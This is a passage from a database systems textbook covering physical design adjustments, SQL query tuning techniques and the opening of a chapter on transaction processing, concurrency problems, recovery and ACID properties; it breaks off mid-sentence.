In Section 1.2, we discussed the need for a possible denormalization, which is a
departure from keeping all tables as BCNF relations. If a given physical database
design does not meet the expected objectives, the DBA may revert to the logical
database design, make adjustments such as denormalizations to the logical schema,
and remap it to a new set of physical tables and indexes.

As discussed, the entire database design has to be driven by the processing require-
ments as much as by data requirements. If the processing requirements are dynam-
ically changing, the design needs to respond by making changes to the conceptual
schema if necessary and to reflect those changes into the logical schema and physi-
cal design. These changes may be of the following nature:

■ Existing tables may be joined (denormalized) because certain attributes
from two or more tables are frequently needed together: This reduces the
normalization level from BCNF to 3NF, 2NF, or 1NF.4

■ For the given set of tables, there may be alternative design choices, all of
which achieve 3NF or BCNF. One normalized design may be replaced by
another.

■ A relation of the form R(K,A, B, C, D, …)—with K as a set of key attributes—
that is in BCNF can be stored in multiple tables that are also in BCNF—for
example, R1(K, A, B), R2(K, C, D), R3(K, …)—by replicating the key K in each
table. Such a process is known as vertical partitioning. Each table groups

4Note that 3NF and 2NF address different types of problem dependencies that are independent of each
other; hence, the normalization (or denormalization) order between them is arbitrary.

sets of attributes that are accessed together. For example, the table
EMPLOYEE(Ssn, Name, Phone, Grade, Salary) may be split into two tables:
EMP1(Ssn, Name, Phone) and EMP2(Ssn, Grade, Salary). If the original table
has a large number of rows (say 100,000) and queries about phone numbers
and salary information are totally distinct and occur with very different fre-
quencies, then this separation of tables may work better.

■ Attribute(s) from one table may be repeated in another even though this cre-
ates redundancy and a potential anomaly. For example, Part_name may be
replicated in tables wherever the Part# appears (as foreign key), but there
may be one master table called PART_MASTER(Part#, Part_name, …) where
the Part_name is guaranteed to be up-to-date.

■ Just as vertical partitioning splits a table vertically into multiple tables,
horizontal partitioning takes horizontal slices of a table and stores them as
distinct tables. For example, product sales data may be separated into ten
tables based on ten product lines. Each table has the same set of columns
(attributes) but contains a distinct set of products (tuples). If a query or
transaction applies to all product data, it may have to run against all the
tables and the results may have to be combined.

These types of adjustments designed to meet the high volume of queries or transac-
tions, with or without sacrificing the normal forms, are commonplace in practice.
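A rough SQL sketch of the vertical and horizontal partitioning adjustments described above; the EMPLOYEE split follows the EMP1/EMP2 example, while the two product-line sales tables and all column types are hypothetical names used only for illustration:

-- Vertical partitioning: replicate the key Ssn and split the remaining attributes
CREATE TABLE EMP1 ( Ssn CHAR(9) PRIMARY KEY, Name VARCHAR(40), Phone VARCHAR(15) );
CREATE TABLE EMP2 ( Ssn CHAR(9) PRIMARY KEY, Grade INT, Salary DECIMAL(10,2) );

-- Horizontal partitioning: same columns, disjoint sets of rows (one table per product line)
CREATE TABLE SALES_LINE1 ( Product_id INT, Month INT, Sales DECIMAL(12,2) );
CREATE TABLE SALES_LINE2 ( Product_id INT, Month INT, Sales DECIMAL(12,2) );

-- A query over all product data must run against every partition and combine the results
SELECT Month, SUM(Sales) AS Total_sales
FROM ( SELECT Month, Sales FROM SALES_LINE1
       UNION ALL
       SELECT Month, Sales FROM SALES_LINE2 ) AS ALL_SALES
GROUP BY Month;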

2.3 Tuning Queries
We already discussed how query performance is dependent upon the appropriate
selection of indexes, and how indexes may have to be tuned after analyzing queries
that give poor performance by using the commands in the RDBMS that show the
execution plan of the query. There are mainly two indications that suggest that
query tuning may be needed:

1. A query issues too many disk accesses (for example, an exact match query
scans an entire table).

2. The query plan shows that relevant indexes are not being used.

Some typical instances of situations prompting query tuning include the following:

1. Many query optimizers do not use indexes in the presence of arithmetic
expressions (such as Salary/365 > 10.50), numerical comparisons of attrib-
utes of different sizes and precision (such as Aqty = Bqty where Aqty is of type
INTEGER and Bqty is of type SMALLINTEGER), NULL comparisons (such as
Bdate IS NULL), and substring comparisons (such as Lname LIKE ‘%mann’).
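A common workaround for the first of these cases, sketched here, is to move the arithmetic off the indexed column so that the predicate becomes a plain comparison the optimizer can match against an index (the constant 3832.50 is simply 10.50 * 365):

-- Original form: the expression on Salary typically blocks use of an index on Salary
--     ... WHERE Salary / 365 > 10.50
-- Equivalent rewriting with the arithmetic folded into the constant:
SELECT Ssn
FROM   EMPLOYEE
WHERE  Salary > 3832.50;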

2. Indexes are often not used for nested queries using IN; for example, the fol-
lowing query:

SELECT Ssn
FROM EMPLOYEE
WHERE Dno IN ( SELECT Dnumber
               FROM DEPARTMENT
               WHERE Mgr_ssn = '333445555' );

may not use the index on Dno in EMPLOYEE, whereas using Dno = Dnumber
in the WHERE-clause with a single block query may cause the index to be
used.
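For instance, the nested query above could be written as the following single-block query (a sketch using the same EMPLOYEE and DEPARTMENT attributes), which gives the optimizer a chance to use an index on Dno:

SELECT E.Ssn
FROM   EMPLOYEE E, DEPARTMENT D
WHERE  E.Dno = D.Dnumber
  AND  D.Mgr_ssn = '333445555';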

3. Some DISTINCTs may be redundant and can be avoided without changing
the result. A DISTINCT often causes a sort operation and must be avoided as
much as possible.

4. Unnecessary use of temporary result tables can be avoided by collapsing
multiple queries into a single query unless the temporary relation is needed
for some intermediate processing.

5. In some situations involving the use of correlated queries, temporaries are
useful. Consider the following query, which retrieves the highest paid
employee in each department:

SELECT Ssn
FROM EMPLOYEE E
WHERE Salary = ( SELECT MAX (Salary)
                 FROM EMPLOYEE AS M
                 WHERE M.Dno = E.Dno );

This has the potential danger of searching all of the inner EMPLOYEE table M
for each tuple from the outer EMPLOYEE table E. To make the execution
more efficient, the process can be broken into two queries, where the first
query just computes the maximum salary in each department as follows:

SELECT MAX (Salary) AS High_salary, Dno INTO TEMP
FROM EMPLOYEE
GROUP BY Dno;

SELECT EMPLOYEE.Ssn
FROM EMPLOYEE, TEMP
WHERE EMPLOYEE.Salary = TEMP.High_salary
  AND EMPLOYEE.Dno = TEMP.Dno;

6. If multiple options for a join condition are possible, choose one that uses a
clustering index and avoid those that contain string comparisons. For exam-
ple, assuming that the Name attribute is a candidate key in EMPLOYEE and
STUDENT, it is better to use EMPLOYEE.Ssn = STUDENT.Ssn as a join condi-
tion rather than EMPLOYEE.Name = STUDENT.Name if Ssn has a clustering
index in one or both tables.

7. One idiosyncrasy with some query optimizers is that the order of tables in
the FROM-clause may affect the join processing. If that is the case, one may
have to switch this order so that the smaller of the two relations is scanned
and the larger relation is used with an appropriate index.

8. Some query optimizers perform worse on nested queries compared to their
equivalent unnested counterparts. There are four types of nested queries:

■ Uncorrelated subqueries with aggregates in an inner query.

■ Uncorrelated subqueries without aggregates.

■ Correlated subqueries with aggregates in an inner query.

■ Correlated subqueries without aggregates.

Of the four types above, the first one typically presents no problem, since
most query optimizers evaluate the inner query once. However, for a query
of the second type, such as the example in item 2, most query optimizers
may not use an index on Dno in EMPLOYEE. However, the same optimizers
may do so if the query is written as an unnested query. Transformation of
correlated subqueries may involve setting temporary tables. Detailed exam-
ples are outside our scope here.5

9. Finally, many applications are based on views that define the data of interest
to those applications. Sometimes, these views become overkill, because a
query may be posed directly against a base table, rather than going through a
view that is defined by a JOIN.

2.4 Additional Query Tuning Guidelines
Additional techniques for improving queries apply in certain situations as follows:

1. A query with multiple selection conditions that are connected via OR may
not be prompting the query optimizer to use any index. Such a query may be
split up and expressed as a union of queries, each with a condition on an
attribute that causes an index to be used. For example,

SELECT Fname, Lname, Salary, Age
FROM EMPLOYEE
WHERE Age > 45 OR Salary < 50000;

may be executed using a sequential scan, giving poor performance. Splitting it up as

SELECT Fname, Lname, Salary, Age
FROM EMPLOYEE
WHERE Age > 45
UNION
SELECT Fname, Lname, Salary, Age
FROM EMPLOYEE
WHERE Salary < 50000;

may utilize indexes on Age as well as on Salary.

2. To help expedite a query, the following transformations may be tried:

■ NOT condition may be transformed into a positive expression.

■ Embedded SELECT blocks using IN, = ALL, = ANY, and = SOME may be replaced by joins.

■ If an equality join is set up between two tables, the range predicate (selection condition) on the joining attribute set up in one table may be repeated for the other table.

5For further details, see Shasha and Bonnet (2002).
6We modified the schema and used Age in EMPLOYEE instead of Bdate.

3. WHERE conditions may be rewritten to utilize the indexes on multiple columns. For example,

SELECT Region#, Prod_type, Month, Sales
FROM SALES_STATISTICS
WHERE Region# = 3 AND ((Prod_type BETWEEN 1 AND 3)
      OR (Prod_type BETWEEN 8 AND 10));

may use an index only on Region# and search through all leaf pages of the index for a match on Prod_type. Instead, using

SELECT Region#, Prod_type, Month, Sales
FROM SALES_STATISTICS
WHERE (Region# = 3 AND (Prod_type BETWEEN 1 AND 3))
      OR (Region# = 3 AND (Prod_type BETWEEN 8 AND 10));

may use a composite index on (Region#, Prod_type) and work much more efficiently.

In this section, we have covered many of the common instances where the inefficiency of a query may be fixed by some simple corrective action such as using a temporary table, avoiding certain types of query constructs, or avoiding the use of views. The goal is to have the RDBMS use existing single attribute or composite attribute indexes as much as possible. This avoids full scans of data blocks or entire scanning of index leaf nodes. Redundant processes like sorting must be avoided at any cost. The problems and the remedies will depend upon the workings of a query optimizer within an RDBMS. Detailed literature exists in database tuning guidelines for database administration by the RDBMS vendors. Major relational DBMS vendors like Oracle, IBM and Microsoft encourage their large customers to share ideas of tuning at the annual expos and other forums so that the entire industry benefits by using performance enhancement techniques. These techniques are typically available in trade literature and on various Web sites.

3 Summary

In this chapter, we discussed the factors that affect physical database design decisions and provided guidelines for choosing among physical design alternatives. We discussed changes to logical design such as denormalization, as well as modifications of indexes, and changes to queries to illustrate different techniques for database performance tuning. These are only a representative sample of a large number of measures and techniques adopted in the design of large commercial applications of relational DBMSs.

Review Questions

1. What are the important factors that influence physical database design?

2. Discuss the decisions made during physical database design.

3. Discuss the guidelines for physical database design in RDBMSs.

4. Discuss the types of modifications that may be applied to the logical database design of a relational database.

5. Under what situations would denormalization of a database schema be used? Give examples of denormalization.

6. Discuss the tuning of indexes for relational databases.

7. Discuss the considerations for reevaluating and modifying SQL queries.

8.
Illustrate the types of changes to SQL queries that may be worth considering for improving the performance during database tuning.

Selected Bibliography

Wiederhold (1987) covers issues related to physical design. O'Neil and O'Neil (2001) has a detailed discussion of physical design and transaction issues in reference to commercial RDBMSs. Navathe and Kerschberg (1986) discuss all phases of database design and point out the role of data dictionaries. Rozen and Shasha (1991) and Carlis and March (1984) present different models for the problem of physical database design. Shasha and Bonnet (2002) has an elaborate discussion of guidelines for database tuning. Niemiec (2008) is one among several books available for Oracle database administration and tuning; Schneider (2006) is focused on designing and tuning MySQL databases.

Figure A.1
A relation TEACH that is in 3NF but not BCNF.

TEACH
Student    Course              Instructor
Narayan    Database            Mark
Smith      Database            Navathe
Smith      Operating Systems   Ammar
Smith      Theory              Schulman
Wallace    Database            Mark
Wallace    Operating Systems   Ahamad
Wong       Database            Omiecinski
Zelaya     Database            Navathe
Narayan    Operating Systems   Ammar

Introduction to Transaction Processing Concepts and Theory

From Chapter 21 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-Wesley. All rights reserved.

The concept of transaction provides a mechanism for describing logical units of database processing. Transaction processing systems are systems with large databases and hundreds of concurrent users executing database transactions. Examples of such systems include airline reservations, banking, credit card processing, online retail purchasing, stock markets, supermarket checkouts, and many other applications. These systems require high availability and fast response time for hundreds of concurrent users.

In this chapter we present the concepts that are needed in transaction processing systems. We define the concept of a transaction, which is used to represent a logical unit of database processing that must be completed in its entirety to ensure correctness. A transaction is typically implemented by a computer program, which includes database commands such as retrievals, insertions, deletions, and updates. In this chapter, we focus on the basic concepts and theory that are needed to ensure the correct executions of transactions. We discuss the concurrency control problem, which occurs when multiple transactions submitted by various users interfere with one another in a way that produces incorrect results. We also discuss the problems that can occur when transactions fail, and how the database system can recover from various types of failures.

This chapter is organized as follows. Section 1 informally discusses why concurrency control and recovery are necessary in a database system. Section 2 defines the term transaction and discusses additional concepts related to transaction processing in database systems. Section 3 presents the important properties of atomicity, consistency preservation, isolation, and durability or permanency—called the ACID properties—that are considered desirable in transaction processing systems. Section 4 introduces the concept of schedules (or histories) of executing transactions and characterizes the recoverability of schedules.
Section 5 discusses the notion of serializability of concurrent transaction execution, which can be used to define cor- rect execution sequences (or schedules) of concurrent transactions. In Section 6, we present some of the commands that support the transaction concept in SQL. Section 7 summarizes the chapter. 1 Introduction to Transaction Processing In this section we discuss the concepts of concurrent execution of transactions and recovery from transaction failures. Section 1.1 compares single-user and multiuser database systems and demonstrates how concurrent execution of transactions can take place in multiuser systems. Section 1.2 defines the concept of transaction and presents a simple model of transaction execution based on read and write database operations. This model is used as the basis for defining and formalizing concur- rency control and recovery concepts. Section 1.3 uses informal examples to show why concurrency control techniques are needed in multiuser systems. Finally, Section 1.4 discusses why techniques are needed to handle recovery from system and transaction failures by discussing the different ways in which transactions can fail while executing. 1.1 Single-User versus Multiuser Systems One criterion for classifying a database system is according to the number of users who can use the system concurrently. A DBMS is single-user if at most one user at a time can use the system, and it is multiuser if many users can use the system—and hence access the database—concurrently. Single-user DBMSs are mostly restricted to personal computer systems; most other DBMSs are multiuser. For example, an airline reservations system is used by hundreds of travel agents and reservation clerks concurrently. Database systems used in banks, insurance agencies, stock exchanges, supermarkets, and many other applications are multiuser systems. In these systems, hundreds or thousands of users are typically operating on the data- base by submitting transactions concurrently to the system. Multiple users can access databases—and use computer systems—simultaneously because of the concept of multiprogramming, which allows the operating system of the computer to execute multiple programs—or processes—at the same time. A single central processing unit (CPU) can only execute at most one process at a time. However, multiprogramming operating systems execute some commands from one process, then suspend that process and execute some commands from the next 748 Introduction to Transaction Processing Concepts and Theory A A B B C D CPU1 CPU2 t1 t2 t3 t4 Time Figure 1 Interleaved process- ing versus parallel processing of con- current transactions. process, and so on. A process is resumed at the point where it was suspended when- ever it gets its turn to use the CPU again. Hence, concurrent execution of processes is actually interleaved, as illustrated in Figure 1, which shows two processes, A and B, executing concurrently in an interleaved fashion. Interleaving keeps the CPU busy when a process requires an input or output (I/O) operation, such as reading a block from disk. The CPU is switched to execute another process rather than remaining idle during I/O time. Interleaving also prevents a long process from delaying other processes. If the computer system has multiple hardware processors (CPUs), parallel process- ing of multiple processes is possible, as illustrated by processes C and D in Figure 1. 
Most of the theory concerning concurrency control in databases is developed in terms of interleaved concurrency, so for the remainder of this chapter we assume this model. In a multiuser DBMS, the stored data items are the primary resources that may be accessed concurrently by interactive users or application programs, which are constantly retrieving information from and modifying the database. 1.2 Transactions, Database Items, Read and Write Operations, and DBMS Buffers A transaction is an executing program that forms a logical unit of database process- ing. A transaction includes one or more database access operations—these can include insertion, deletion, modification, or retrieval operations. The database operations that form a transaction can either be embedded within an application program or they can be specified interactively via a high-level query language such as SQL. One way of specifying the transaction boundaries is by specifying explicit begin transaction and end transaction statements in an application program; in this case, all database access operations between the two are considered as forming one transaction. A single application program may contain more than one transac- tion if it contains several transaction boundaries. If the database operations in a transaction do not update the database but only retrieve data, the transaction is called a read-only transaction; otherwise it is known as a read-write transaction. 749 Introduction to Transaction Processing Concepts and Theory The database model that is used to present transaction processing concepts is quite simple when compared to data models, such as the relational model or the object model. A database is basically represented as a collection of named data items. The size of a data item is called its granularity. A data item can be a database record, but it can also be a larger unit such as a whole disk block, or even a smaller unit such as an individual field (attribute) value of some record in the database. The transaction processing concepts we discuss are independent of the data item granularity (size) and apply to data items in general. Each data item has a unique name, but this name is not typically used by the programmer; rather, it is just a means to uniquely iden- tify each data item. For example, if the data item granularity is one disk block, then the disk block address can be used as the data item name. Using this simplified data- base model, the basic database access operations that a transaction can include are as follows: ■ read_item(X). Reads a database item named X into a program variable. To simplify our notation, we assume that the program variable is also named X. ■ write_item(X). Writes the value of program variable X into the database item named X. The basic unit of data transfer from disk to main memory is one block. Executing a read_item(X) command includes the following steps: 1. Find the address of the disk block that contains item X. 2. Copy that disk block into a buffer in main memory (if that disk block is not already in some main memory buffer). 3. Copy item X from the buffer to the program variable named X. Executing a write_item(X) command includes the following steps: 1. Find the address of the disk block that contains item X. 2. Copy that disk block into a buffer in main memory (if that disk block is not already in some main memory buffer). 3. Copy item X from the program variable named X into its correct location in the buffer. 4. 
Store the updated block from the buffer back to disk (either immediately or at some later point in time). It is step 4 that actually updates the database on disk. In some cases the buffer is not immediately stored to disk, in case additional changes are to be made to the buffer. Usually, the decision about when to store a modified disk block whose contents are in a main memory buffer is handled by the recovery manager of the DBMS in coop- eration with the underlying operating system. The DBMS will maintain in the database cache a number of data buffers in main memory. Each buffer typically holds the contents of one database disk block, which contains some of the database items being processed. When these buffers are all occupied, and additional database disk blocks must be copied into memory, some buffer replacement policy is used to 750 Introduction to Transaction Processing Concepts and Theory (a) read_item(X ); X := X – N; write_item(X ); read_item(Y ); Y := Y + N; write_item(Y ); (b) read_item(X ); X := X + M; write_item(X ); T1 T2 Figure 2 Two sample transac- tions. (a) Transaction T1. (b) Transaction T2. choose which of the current buffers is to be replaced. If the chosen buffer has been modified, it must be written back to disk before it is reused.1 A transaction includes read_item and write_item operations to access and update the database. Figure 2 shows examples of two very simple transactions. The read-set of a transaction is the set of all items that the transaction reads, and the write-set is the set of all items that the transaction writes. For example, the read-set of T1 in Figure 2 is {X, Y} and its write-set is also {X, Y}. Concurrency control and recovery mechanisms are mainly concerned with the database commands in a transaction. Transactions submitted by the various users may execute concurrently and may access and update the same database items. If this concurrent execution is uncontrolled, it may lead to problems, such as an incon- sistent database. In the next section we informally introduce some of the problems that may occur. 1.3 Why Concurrency Control Is Needed Several problems can occur when concurrent transactions execute in an uncon- trolled manner. We illustrate some of these problems by referring to a much simpli- fied airline reservations database in which a record is stored for each airline flight. Each record includes the number of reserved seats on that flight as a named (uniquely identifiable) data item, among other information. Figure 2(a) shows a transaction T1 that transfers N reservations from one flight whose number of reserved seats is stored in the database item named X to another flight whose number of reserved seats is stored in the database item named Y. Figure 2(b) shows a simpler transac- tion T2 that just reserves M seats on the first flight (X) referenced in transaction T1. 2 To simplify our example, we do not show additional portions of the transactions, such as checking whether a flight has enough seats available before reserving addi- tional seats. 1We will not discuss buffer replacement policies here because they are typically discussed in operating systems textbooks. 2A similar, more commonly used example assumes a bank database, with one transaction doing a trans- fer of funds from account X to account Y and the other transaction doing a deposit to account X. 
751 Introduction to Transaction Processing Concepts and Theory When a database access program is written, it has the flight number, flight date, and the number of seats to be booked as parameters; hence, the same program can be used to execute many different transactions, each with a different flight number, date, and number of seats to be booked. For concurrency control purposes, a trans- action is a particular execution of a program on a specific date, flight, and number of seats. In Figure 2(a) and (b), the transactions T1 and T2 are specific executions of the programs that refer to the specific flights whose numbers of seats are stored in data items X and Y in the database. Next we discuss the types of problems we may encounter with these two simple transactions if they run concurrently. The Lost Update Problem. This problem occurs when two transactions that access the same database items have their operations interleaved in a way that makes the value of some database items incorrect. Suppose that transactions T1 and T2 are submitted at approximately the same time, and suppose that their operations are interleaved as shown in Figure 3(a); then the final value of item X is incorrect because T2 reads the value of X before T1 changes it in the database, and hence the updated value resulting from T1 is lost. For example, if X = 80 at the start (originally there were 80 reservations on the flight), N = 5 (T1 transfers 5 seat reservations from the flight corresponding to X to the flight corresponding to Y), and M = 4 (T2 reserves 4 seats on X), the final result should be X = 79. However, in the interleaving of operations shown in Figure 3(a), it is X = 84 because the update in T1 that removed the five seats from X was lost. The Temporary Update (or Dirty Read) Problem. This problem occurs when one transaction updates a database item and then the transaction fails for some rea- son (see Section 1.4). Meanwhile, the updated item is accessed (read) by another transaction before it is changed back to its original value. Figure 3(b) shows an example where T1 updates item X and then fails before completion, so the system must change X back to its original value. Before it can do so, however, transaction T2 reads the temporary value of X, which will not be recorded permanently in the data- base because of the failure of T1. The value of item X that is read by T2 is called dirty data because it has been created by a transaction that has not completed and com- mitted yet; hence, this problem is also known as the dirty read problem. The Incorrect Summary Problem. If one transaction is calculating an aggregate summary function on a number of database items while other transactions are updating some of these items, the aggregate function may calculate some values before they are updated and others after they are updated. For example, suppose that a transaction T3 is calculating the total number of reservations on all the flights; meanwhile, transaction T1 is executing. If the interleaving of operations shown in Figure 3(c) occurs, the result of T3 will be off by an amount N because T3 reads the value of X after N seats have been subtracted from it but reads the value of Y before those N seats have been added to it. 752 Introduction to Transaction Processing Concepts and Theory (a) read_item(X ); X := X – N; write_item(X ); read_item(Y ); read_item(X ); X := X + M; write_item(X ); Time Item X has an incorrect value because its update by T1 is lost (overwritten). 
Y := Y + N; write_item(Y ); (b) read_item(X ); X := X – N; write_item(X ); read_item(X ); X := X + M; write_item(X ); Time Transaction T1 fails and must change the value of X back to its old value; meanwhile T2 has read the temporary incorrect value of X. read_item(Y ); T1 T1 (c) read_item(X ); X := X – N; write_item(X ); read_item(Y ); Y := Y + N; write_item(Y ); read_item(X ); sum := sum + X; read_item(Y ); sum := sum + Y; T3 reads X after N is subtracted and reads Y before N is added; a wrong summary is the result (off by N ). T3 T2 sum := 0; read_item(A); sum := sum + A; T1 T2 Figure 3 Some problems that occur when concurrent execution is uncontrolled. (a) The lost update problem. (b) The temporary update problem. (c) The incorrect summary problem. 753 Introduction to Transaction Processing Concepts and Theory The Unrepeatable Read Problem. Another problem that may occur is called unrepeatable read, where a transaction T reads the same item twice and the item is changed by another transaction T� between the two reads. Hence, T receives different values for its two reads of the same item. This may occur, for example, if during an airline reservation transaction, a customer inquires about seat availability on several flights. When the customer decides on a particular flight, the transaction then reads the number of seats on that flight a second time before completing the reservation, and it may end up reading a different value for the item. 1.4 Why Recovery Is Needed Whenever a transaction is submitted to a DBMS for execution, the system is respon- sible for making sure that either all the operations in the transaction are completed successfully and their effect is recorded permanently in the database, or that the transaction does not have any effect on the database or any other transactions. In the first case, the transaction is said to be committed, whereas in the second case, the transaction is aborted. The DBMS must not permit some operations of a trans- action T to be applied to the database while other operations of T are not, because the whole transaction is a logical unit of database processing. If a transaction fails after executing some of its operations but before executing all of them, the opera- tions already executed must be undone and have no lasting effect. Types of Failures. Failures are generally classified as transaction, system, and media failures. There are several possible reasons for a transaction to fail in the mid- dle of execution: 1. A computer failure (system crash). A hardware, software, or network error occurs in the computer system during transaction execution. Hardware crashes are usually media failures—for example, main memory failure. 2. A transaction or system error. Some operation in the transaction may cause it to fail, such as integer overflow or division by zero. Transaction failure may also occur because of erroneous parameter values or because of a logical programming error.3 Additionally, the user may interrupt the transaction during its execution. 3. Local errors or exception conditions detected by the transaction. During transaction execution, certain conditions may occur that necessitate cancel- lation of the transaction. For example, data for the transaction may not be found. An exception condition,4 such as insufficient account balance in a banking database, may cause a transaction, such as a fund withdrawal, to be canceled. 
This exception could be programmed in the transaction itself, and in such a case would not be considered as a transaction failure. 3In general, a transaction should be thoroughly tested to ensure that it does not have any bugs (logical programming errors). 4Exception conditions, if programmed correctly, do not constitute transaction failures. 754 Introduction to Transaction Processing Concepts and Theory 4. Concurrency control enforcement. The concurrency control method may decide to abort a transaction because it violates serializability (see Section 5), or it may abort one or more transactions to resolve a state of deadlock among several transactions. Transactions aborted because of serializability violations or deadlocks are typically restarted automatically at a later time. 5. Disk failure. Some disk blocks may lose their data because of a read or write malfunction or because of a disk read/write head crash. This may happen during a read or a write operation of the transaction. 6. Physical problems and catastrophes. This refers to an endless list of prob- lems that includes power or air-conditioning failure, fire, theft, sabotage, overwriting disks or tapes by mistake, and mounting of a wrong tape by the operator. Failures of types 1, 2, 3, and 4 are more common than those of types 5 or 6. Whenever a failure of type 1 through 4 occurs, the system must keep sufficient information to quickly recover from the failure. Disk failure or other catastrophic failures of type 5 or 6 do not happen frequently; if they do occur, recovery is a major task. The concept of transaction is fundamental to many techniques for concurrency control and recovery from failures. 2 Transaction and System Concepts In this section we discuss additional concepts relevant to transaction processing. Section 2.1 describes the various states a transaction can be in, and discusses other operations needed in transaction processing. Section 2.2 discusses the system log, which keeps information about transactions and data items that will be needed for recovery. Section 2.3 describes the concept of commit points of transactions, and why they are important in transaction processing. 2.1 Transaction States and Additional Operations A transaction is an atomic unit of work that should either be completed in its entirety or not done at all. For recovery purposes, the system needs to keep track of when each transaction starts, terminates, and commits or aborts (see Section 2.3). Therefore, the recovery manager of the DBMS needs to keep track of the following operations: ■ BEGIN_TRANSACTION. This marks the beginning of transaction execution. ■ READ or WRITE. These specify read or write operations on the database items that are executed as part of a transaction. ■ END_TRANSACTION. This specifies that READ and WRITE transaction oper- ations have ended and marks the end of transaction execution. However, at this point it may be necessary to check whether the changes introduced by 755 Introduction to Transaction Processing Concepts and Theory Active Begin transaction End transaction Commit AbortAbort Read, Write Partially committed Failed Terminated Committed Figure 4 State transition diagram illustrating the states for transaction execution. the transaction can be permanently applied to the database (committed) or whether the transaction has to be aborted because it violates serializability (see Section 5) or for some other reason. ■ COMMIT_TRANSACTION. 
This signals a successful end of the transaction so that any changes (updates) executed by the transaction can be safely committed to the database and will not be undone. ■ ROLLBACK (or ABORT). This signals that the transaction has ended unsuc- cessfully, so that any changes or effects that the transaction may have applied to the database must be undone. Figure 4 shows a state transition diagram that illustrates how a transaction moves through its execution states. A transaction goes into an active state immediately after it starts execution, where it can execute its READ and WRITE operations. When the transaction ends, it moves to the partially committed state. At this point, some recovery protocols need to ensure that a system failure will not result in an inability to record the changes of the transaction permanently (usually by recording changes in the system log, discussed in the next section).5 Once this check is successful, the transaction is said to have reached its commit point and enters the committed state. Commit points are discussed in more detail in Section 2.3. When a transaction is committed, it has concluded its execution successfully and all its changes must be recorded permanently in the database, even if a system failure occurs. However, a transaction can go to the failed state if one of the checks fails or if the transaction is aborted during its active state. The transaction may then have to be rolled back to undo the effect of its WRITE operations on the database. The terminated state corresponds to the transaction leaving the system. The transaction information that is maintained in system tables while the transaction has been run- ning is removed when the transaction terminates. Failed or aborted transactions may be restarted later—either automatically or after being resubmitted by the user—as brand new transactions. 5Optimistic concurrency control also requires that certain checks are made at this point to ensure that the transaction did not interfere with other executing transactions. 756 Introduction to Transaction Processing Concepts and Theory 2.2 The System Log To be able to recover from failures that affect transactions, the system maintains a log6 to keep track of all transaction operations that affect the values of database items, as well as other transaction information that may be needed to permit recov- ery from failures. The log is a sequential, append-only file that is kept on disk, so it is not affected by any type of failure except for disk or catastrophic failure. Typically, one (or more) main memory buffers hold the last part of the log file, so that log entries are first added to the main memory buffer. When the log buffer is filled, or when certain other conditions occur, the log buffer is appended to the end of the log file on disk. In addition, the log file from disk is periodically backed up to archival storage (tape) to guard against catastrophic failures. The following are the types of entries—called log records—that are written to the log file and the corresponding action for each log record. In these entries, T refers to a unique transaction-id that is generated automatically by the system for each transaction and that is used to identify each transaction: 1. [start_transaction, T]. Indicates that transaction T has started execution. 2. [write_item, T, X, old_value, new_value]. Indicates that transaction T has changed the value of database item X from old_value to new_value. 3. [read_item, T, X]. 
Indicates that transaction T has read the value of database item X. 4. [commit, T]. Indicates that transaction T has completed successfully, and affirms that its effect can be committed (recorded permanently) to the data- base. 5. [abort, T]. Indicates that transaction T has been aborted. Protocols for recovery that avoid cascading rollbacks (see Section 4.2)—which include nearly all practical protocols—do not require that READ operations are writ- ten to the system log. However, if the log is also used for other purposes—such as auditing (keeping track of all database operations)—then such entries can be included. Additionally, some recovery protocols require simpler WRITE entries only include one of new_value and old_value instead of including both (see Section 4.2). Notice that we are assuming that all permanent changes to the database occur within transactions, so the notion of recovery from a transaction failure amounts to either undoing or redoing transaction operations individually from the log. If the system crashes, we can recover to a consistent database state by examining the log (and using techniques not detailed here). Because the log contains a record of every WRITE operation that changes the value of some database item, it is possible to undo the effect of these WRITE operations of a transaction T by tracing backward through the log and resetting all items changed by a WRITE operation of T to their old_values. Redo of an operation may also be necessary if a transaction has its updates recorded in the log but a failure occurs before the system can be sure that all 6The log has sometimes been called the DBMS journal. 757 Introduction to Transaction Processing Concepts and Theory these new_values have been written to the actual database on disk from the main memory buffers. 2.3 Commit Point of a Transaction A transaction T reaches its commit point when all its operations that access the database have been executed successfully and the effect of all the transaction opera- tions on the database have been recorded in the log. Beyond the commit point, the transaction is said to be committed, and its effect must be permanently recorded in the database. The transaction then writes a commit record [commit, T] into the log. If a system failure occurs, we can search back in the log for all transactions T that have written a [start_transaction, T] record into the log but have not written their [commit, T] record yet; these transactions may have to be rolled back to undo their effect on the database during the recovery process. Transactions that have written their commit record in the log must also have recorded all their WRITE operations in the log, so their effect on the database can be redone from the log records. Notice that the log file must be kept on disk. Updating a disk file involves copying the appropriate block of the file from disk to a buffer in main memory, updating the buffer in main memory, and copying the buffer to disk. It is common to keep one or more blocks of the log file in main memory buffers, called the log buffer, until they are filled with log entries and then to write them back to disk only once, rather than writing to disk every time a log entry is added. This saves the overhead of multiple disk writes of the same log file buffer. At the time of a system crash, only the log entries that have been written back to disk are considered in the recovery process because the contents of main memory may be lost. 
Hence, before a transaction reaches its commit point, any portion of the log that has not been written to the disk yet must now be written to the disk. This process is called force-writing the log buffer before committing a transaction. 3 Desirable Properties of Transactions Transactions should possess several properties, often called the ACID properties; they should be enforced by the concurrency control and recovery methods of the DBMS. The following are the ACID properties: ■ Atomicity. A transaction is an atomic unit of processing; it should either be performed in its entirety or not performed at all. ■ Consistency preservation. A transaction should be consistency preserving, meaning that if it is completely executed from beginning to end without interference from other transactions, it should take the database from one consistent state to another. ■ Isolation. A transaction should appear as though it is being executed in iso- lation from other transactions, even though many transactions are executing 758 Introduction to Transaction Processing Concepts and Theory concurrently. That is, the execution of a transaction should not be interfered with by any other transactions executing concurrently. ■ Durability or permanency. The changes applied to the database by a com- mitted transaction must persist in the database. These changes must not be lost because of any failure. The atomicity property requires that we execute a transaction to completion. It is the responsibility of the transaction recovery subsystem of a DBMS to ensure atomicity. If a transaction fails to complete for some reason, such as a system crash in the midst of transaction execution, the recovery technique must undo any effects of the transaction on the database. On the other hand, write operations of a committed transaction must be eventually written to disk. The preservation of consistency is generally considered to be the responsibility of the programmers who write the database programs or of the DBMS module that enforces integrity constraints. Recall that a database state is a collection of all the stored data items (values) in the database at a given point in time. A consistent state of the database satisfies the constraints specified in the schema as well as any other constraints on the database that should hold. A database program should be written in a way that guarantees that, if the database is in a consistent state before executing the transaction, it will be in a consistent state after the complete execution of the transaction, assuming that no interference with other transactions occurs. The isolation property is enforced by the 